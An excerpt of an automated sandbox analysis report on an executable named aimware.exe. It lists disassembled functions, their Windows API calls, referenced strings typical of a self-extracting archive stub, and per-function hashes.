Part of subcall function 00AD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADC896,?,00000000,?,00000000,?,00ADC8BD,?,00000007,?,?,00ADCCBA,?), ref: 00AD8DE2
Part of subcall function 00AD8DCC: GetLastError.KERNEL32(?,?,00ADC896,?,00000000,?,00000000,?,00ADC8BD,?,00000007,?,?,00ADCCBA,?,?), ref: 00AD8DF4

_free.LIBCMT ref: 00AD8930
_free.LIBCMT ref: 00AD8943
_free.LIBCMT ref: 00AD8954
_free.LIBCMT ref: 00AD8965

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ad03845c1caeecd9cc97aeab7f36ca1a5f34e6f51da892629f501f21a2796dd0
Instruction ID: 051d49424fad1eb7e4ed027209f617a13bae2bf92e1e272a64ff18930e69b467
Opcode Fuzzy Hash: ad03845c1caeecd9cc97aeab7f36ca1a5f34e6f51da892629f501f21a2796dd0
Instruction Fuzzy Hash: BAF03A71810126AB8606AF24FD424993BB2F768710390454BF496973F5CF3A8962ABC1

Function 00AC15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00AC17BC
_swprintf.LIBCMT ref: 00AC186B

Strings

%ls, xrefs: 00AC1641, 00AC1657
%s: %s, xrefs: 00AC17CB

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 8fa1fc4455343d5ddfe32b5d674010c7a9af798d7f7276d413da6e02269b5247
Instruction ID: 89dd74a03bfa48f4d21dd0c788a47fb75c2c930444bc14ae6e444bd74782a8b1
Opcode Fuzzy Hash: 8fa1fc4455343d5ddfe32b5d674010c7a9af798d7f7276d413da6e02269b5247
Instruction Fuzzy Hash: 5B51EA3538C300F6EA215B948E46F7573BAAB07B04F26450EF386744E3D9A2A410BB5B

Function 00AD7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\aimware.exe,00000104), ref: 00AD7FAE
_free.LIBCMT ref: 00AD8079
_free.LIBCMT ref: 00AD8083

Strings

C:\Users\user\Desktop\aimware.exe, xrefs: 00AD7FA5, 00AD7FAC, 00AD7FDB, 00AD8013

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\aimware.exe
API String ID: 2506810119-2570586331
Opcode ID: f6e26bdbb31a1d4c94d1aeadcdcde981b63ef4becea44c0b120ae54b367dc311
Instruction ID: 7005a38c382c9a267344bbbac419ef4bf0e736b30a19f267383cd0f2fb019cd8
Opcode Fuzzy Hash: f6e26bdbb31a1d4c94d1aeadcdcde981b63ef4becea44c0b120ae54b367dc311
Instruction Fuzzy Hash: 9D31AE71A00208AFCB21EF99D9809DEBBBCEF84310F1041ABF90697350DB748E44CB61

Function 00AD31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00AD31FB
_abort.LIBCMT ref: 00AD3306

Strings

MOC, xrefs: 00AD320D
RCC, xrefs: 00AD3215

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 8ae9078c0d9dbb21240283b65de8919aa7cabb70036d5e23b9b0262baeffeff0
Instruction ID: 4561723ead109591ad601b42e0dc443df8e6ef69ff894c05302b0f131e31348b
Opcode Fuzzy Hash: 8ae9078c0d9dbb21240283b65de8919aa7cabb70036d5e23b9b0262baeffeff0
Instruction Fuzzy Hash: 07416872D00209AFCF15DF98CD81AEEBBB5FF58304F18805AF906A7221D335AA50DB51

Function 00AB7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB7406

Part of subcall function 00AB3BBA: __EH_prolog.LIBCMT ref: 00AB3BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00AB74CD

Part of subcall function 00AB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00AB7AAB
Part of subcall function 00AB7A9C: GetLastError.KERNEL32 ref: 00AB7AF1
Part of subcall function 00AB7A9C: CloseHandle.KERNEL32(?), ref: 00AB7B00

Strings

SeRestorePrivilege, xrefs: 00AB7460
SeSecurityPrivilege, xrefs: 00AB744B

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 07c46f27f19e5a08482e2ee9949ed697d756252edbf01d8ba736122322900f39
Instruction ID: f5413174f9e9bc8f037f90035664916226e1bfe18bcb9d2d9c40ebbc63c13ccf
Opcode Fuzzy Hash: 07c46f27f19e5a08482e2ee9949ed697d756252edbf01d8ba736122322900f39
Instruction Fuzzy Hash: 9F31C271E04248AADF21EBE4CD45FFE7BADAF49300F044059F405A7283DBB48A44CB61

Function 00ACAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00AB1316: GetDlgItem.USER32(00000000,00003021), ref: 00AB135A
Part of subcall function 00AB1316: SetWindowTextW.USER32(00000000,00AE35F4), ref: 00AB1370

EndDialog.USER32(?,00000001), ref: 00ACAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00ACADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00ACADC2

Strings

ASKNEXTVOL, xrefs: 00ACAD28

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 17b597df63fb42db230f1c153d0d1ddb5061866e16c95c2920a71921ab2ecde4
Instruction ID: bec59a504a7808a22c826d4be5cc2c7db54f935a238c20fec559e4f1f439ef66
Opcode Fuzzy Hash: 17b597df63fb42db230f1c153d0d1ddb5061866e16c95c2920a71921ab2ecde4
Instruction Fuzzy Hash: 16112932240204BFD7129F6CED08FF637ADEF1A74AF414404F342EB4A1CB6199409766

Function 00ABD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00ABD954
_strncpy.LIBCMT ref: 00ABD99A

Part of subcall function 00AC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00AF1030,00000200,00ABD928,00000000,?,00000050,00AF1030), ref: 00AC1DC4

Strings

@%s, xrefs: 00ABD93E
$%s, xrefs: 00ABD949

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 181aaa7bef6b74cc5bfebdf9ec21b91cad0d66ebe633e3bd63c023d649b2cf7e
Instruction ID: 112fc22d04dcabddefceaa41886f25d1105ef87923435849096fcbba85728d52
Opcode Fuzzy Hash: 181aaa7bef6b74cc5bfebdf9ec21b91cad0d66ebe633e3bd63c023d649b2cf7e
Instruction Fuzzy Hash: 8B219D7254028CAEEF21EFA4CD06FEE7BACAF05304F040526F911975A3F272D6488B51

Function 00AC0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00ABAC5A,00000008,?,00000000,?,00ABD22D,?,00000000), ref: 00AC0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00ABAC5A,00000008,?,00000000,?,00ABD22D,?,00000000), ref: 00AC0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00ABAC5A,00000008,?,00000000,?,00ABD22D,?,00000000), ref: 00AC0E9F

Strings

Thread pool initialization failed., xrefs: 00AC0EB7

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 0919c038fa8bba724e68542f5118ff2bf8d3aec76a513a4a84cc49dbcd899ce1
Instruction ID: 8f53131e040143d6f3a67b388e8409e41ddce98a464ccf331a424ee628875432
Opcode Fuzzy Hash: 0919c038fa8bba724e68542f5118ff2bf8d3aec76a513a4a84cc49dbcd899ce1
Instruction Fuzzy Hash: 1A114FB2680708DBC3219F6A9C84EA7FBECEB59744F15482EF1DA87201D67159418B54

Function 00ACB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00AB1316: GetDlgItem.USER32(00000000,00003021), ref: 00AB135A
Part of subcall function 00AB1316: SetWindowTextW.USER32(00000000,00AE35F4), ref: 00AB1370

EndDialog.USER32(?,00000001), ref: 00ACB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00ACB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00ACB304

Strings

GETPASSWORD1, xrefs: 00ACB289

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: d2515aae01c1ce5a6ff243993f3bb6ea35150a05f3deab591db1d5bcbaa7b282
Instruction ID: d312fb29b930ae2560eda9045af8f141694b126379c11ae2a5e1606ab7f648ad
Opcode Fuzzy Hash: d2515aae01c1ce5a6ff243993f3bb6ea35150a05f3deab591db1d5bcbaa7b282
Instruction Fuzzy Hash: BD110432910128BADB229B74AD4AFFF37BCEF19700F010025FA46B71C0DBA69A409771

Function 00ACDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00ACDD1C, 00ACDD50
RENAMEDLG, xrefs: 00ACDD31

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 6771d7600ec10e84bcd98734b5e489e96de28272e61635c00ea59cd5a7f15105
Instruction ID: 0f9e8ae72fdd141cb730f38b67c76061cd978577c13c789614451b5d3e5a1633
Opcode Fuzzy Hash: 6771d7600ec10e84bcd98734b5e489e96de28272e61635c00ea59cd5a7f15105
Instruction Fuzzy Hash: 74017176A05285BFDB129FE5FC44FA67BA8FB08755B01483DF90683230DB359852DBA0

Function 00ACDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00ACDBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00ACDC30

Strings

sfxpar, xrefs: 00ACDC2B
sfxcmd, xrefs: 00ACDBEF

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: b2e8b77e812327e6eff6b0aebc3b64b74492a165d412fe5ec46c226c503d17f5
Instruction ID: 8d2a5d20bd12498c942eb22585c23f05f3e6f0cb581fa20975e1f23ad33971ce
Opcode Fuzzy Hash: b2e8b77e812327e6eff6b0aebc3b64b74492a165d412fe5ec46c226c503d17f5
Instruction Fuzzy Hash: CBF0EC73409224F7CF206FE59D4AFFB3B58BF04B81B05056DBD859A151D6B08940D7B0

Function 00AD9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00AD9AA9
__alldvrm.LIBCMT ref: 00AD9CAA
__alldvrm.LIBCMT ref: 00AD9CCC

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction ID: e040ffa5734c10418767903e7db42e812dd9f26c7a10d1131070c493d8a5c25a
Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction Fuzzy Hash: EEA10372A142869FEB21CF68C8917AFBBE5EF55350F28416FE5869B381C238CD41C750

Function 00ABA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00AB7F69,?,?,?), ref: 00ABA3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00AB7F69,?), ref: 00ABA43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00AB7F69,?,?,?,?,?,?,?), ref: 00ABA4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00AB7F69,?,?,?,?,?,?,?,?,?,?), ref: 00ABA4C6

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 8e63fb106c823235cf435751b74a8fc2b3a390539639587c84392880495dd460
Instruction ID: 0caa400a2851af398a8d211338b4d6bb68cf5e20285a6b8e498216368e3ebe22
Opcode Fuzzy Hash: 8e63fb106c823235cf435751b74a8fc2b3a390539639587c84392880495dd460
Instruction Fuzzy Hash: 3541E131248381AAE731DF24DC49FEEBBE89B91300F04091DB5D197182D6B4DA48DB53

Function 00AB1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AB112B
_wcslen.LIBCMT ref: 00AB1153
_wcslen.LIBCMT ref: 00AB1182
_wcslen.LIBCMT ref: 00AB11A9

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: be8ee167807d44c82720f1362e626e2a731a29ca734b0b88f2f8b13707b6fdc4
Instruction ID: 7bc14a9f0e949b182999c16be31a58ececdd6f0b454900b8031999f705db5579
Opcode Fuzzy Hash: be8ee167807d44c82720f1362e626e2a731a29ca734b0b88f2f8b13707b6fdc4
Instruction Fuzzy Hash: 0C41D7719006659BCB119F688D19ADE7BFCEF04310F41402DFE45F7242DF34AE458AA4

Function 00ADC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00AD91E0,?,00000000,?,00000001,?,?,00000001,00AD91E0,?), ref: 00ADC9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00ADCA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00AD6CBE,?), ref: 00ADCA70
__freea.LIBCMT ref: 00ADCA79

Part of subcall function 00AD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00ADCA2C,00000000,?,00AD6CBE,?,00000008,?,00AD91E0,?,?,?), ref: 00AD8E38

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 66481cc64f91fac4f091b6ffe174de2d58c7c9276453a554076840aa7d742f34
Instruction ID: a5a7e5453f08346b0a85ae9e4ccb8ac54c1f97570338b036fb559065f10c5e08
Opcode Fuzzy Hash: 66481cc64f91fac4f091b6ffe174de2d58c7c9276453a554076840aa7d742f34
Instruction Fuzzy Hash: 1131B37290021AABDF24DF64CC85DBE7BA6EB01360B544269FC06DB2A0E735DD51CB90

Function 00ACA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00ACA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00ACA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ACA683
ReleaseDC.USER32(00000000,00000000), ref: 00ACA691

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 73ac2fb7c918adeb55ed63c74c929e8e6467e094a1be0babdca4779eb4597c7a
Instruction ID: 01a56b8fdc49c41ae81b55fe1b169e67cc994e4c0ef043e6f8d5a8e018a709b6
Opcode Fuzzy Hash: 73ac2fb7c918adeb55ed63c74c929e8e6467e094a1be0babdca4779eb4597c7a
